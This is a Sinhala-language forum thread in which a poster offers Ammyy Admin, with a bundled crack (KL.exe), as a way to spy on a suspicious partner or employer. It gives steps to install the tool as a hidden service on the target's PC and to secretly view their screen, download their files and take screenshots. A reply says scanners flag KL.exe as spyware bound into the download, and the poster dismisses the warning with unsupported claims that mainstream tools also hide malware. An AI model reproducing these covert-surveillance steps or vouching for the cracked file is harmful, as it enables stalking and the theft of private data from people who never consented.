උබලත් මරු මිනිස්සු බන්.. දැන හෝ නොදැන තමන්ටම කරගන්නෙ මොනතරම් හානියක්ද කියල පොඩ්ඩක් හොයල බලහල්ලා 


උබලත් මරු මිනිස්සු බන්.. දැන හෝ නොදැන තමන්ටම කරගන්නෙ මොනතරම් හානියක්ද කියල පොඩ්ඩක් හොයල බලහල්ලා
![]()
නොදන්න උන්ට කියන්නේ... ගෑනි/කෙල්ල පිට යනවනම් පිට යයි.. ඊට වඩා අමාරුවක වැටෙන්නෙ මේව තොපේ PCවලට දාගෙනෙ![]()
Ammy my ass.!![]()
Ammyy Admin: ඔබේ සැකකාර සහකරුවා හෝ සහකාරියගේ, ඔබේ සේවා යෝජකයාගේ, පරිගණක භාවිතය පිළිබද ඔත්තු බැලීමට හොද App එකක්.
භාවිතය:
* ඔබේ සැකකරුගේ සහ ඔබේ පරිගණක දෙකටම Ammyy Download කරන්න.
* සැකකරුගේ පරිගණකයේ Ammyy Run කොට, Ammyy>Service>Install ක්ලික් කරන්න.
* මීලග වර සකකරු තම පරිගණකය Reboot කරන විට, ඔහු/ඇයට නොපෙනෙන සේ Ammyy Run වෙනු ඇත.
* සැකකරුගේ ID එක කොපි කර ගන්න. ("Your ID" බොක්සය)
* දැන් ඔබේ පරිගණකයේ Ammyy Run කර, Zip file එකෙහි ඇති KL.exe Run කොට Ammy CRACK කරන්න.
* සැකකරුගේ ID එක "Client ID / IP" බොක්සයට ඇතුළු කර "Connect" ක්ලික් කරන්න. සැකකරුගේ පරිගණක තිරය ඔබේ මොනිටරයට ලෝඩ් වෙනු ඇති අතර, සැකකරුට නොදැනී ඔහු/ඇයගේ පරිගණක ක්‍රියාකාරීත්වය නිරීක්ෂණය කිරීමටද, පරිගණකයේ ෆයිල් ඩවුන්ලෝඩ් කිරීම, Screenshots ලබාගැනීම සහ වෙනත් එවැනි දෑද ඔබට කල හැකි වනු ඇත.
![]()
DOWNLOAD
ස්කෑන් කරොත් මේව එනවා තමා. මේක Spyware එකක්. ඒවා වැඩ කරන්නේ backdoor exploits වලින්. මේවා අහුවුනා කියලා කාගෙවත් PC වලට මුකුත් වෙන් නෑ. ඔය Teamviwer, Skype වගේ ඒවල ඔය malware නෑ කියලද හිතන්නේ? තියනවා, අහුවෙන් නැතිවෙන්ඩ කෝඩ් කරල තියෙන්නෙ. Ammy කියන්නේ Teamviwer ම තමා -- Server PC එකට Notifications පෙන්නන් නැති එක විතරයි වෙනස.
හරි හරි බන්. ammyy කියන සොෆ්ට්වෙයා එක ප්‍රසිද්ධ එකක් තමයි. ඒත් අපි මේ කතා කරන්නෙ අර KL.exe එකට උබ බයින්ඩ් කරලා දාලා තියෙන එක ගැනයි.ස්කෑන් කරොත් මේව එනවා තමා. මේක Spyware එකක්. ඒවා වැඩ කරන්නේ backdoor exploits වලින්. මේවා අහුවුනා කියලා කාගෙවත් PC වලට මුකුත් වෙන් නෑ. ඔය Teamviwer, Skype වගේ ඒවල ඔය malware නෑ කියලද හිතන්නේ? තියනවා, අහුවෙන් නැතිවෙන්ඩ කෝඩ් කරල තියෙන්නෙ. Ammy කියන්නේ Teamviwer ම තමා -- Server PC එකට Notifications පෙන්නන් නැති එක විතරයි වෙනස.
හරි හරි බන්. ammyy කියන සොෆ්ට්වෙයා එක ප්‍රසිද්ධ එකක් තමයි. ඒත් අපි මේ කතා කරන්නෙ අර KL.exe එකට උබ බයින්ඩ් කරලා දාලා තියෙන එක ගැනයි.
ඒක මං හදපු Crack එක Assembler වලින්. ඒක Run කරේ නැත්තං ammy feed එක විනාඩි 15න් 15ට වගේ ඩ්‍රොප් වෙනවා.

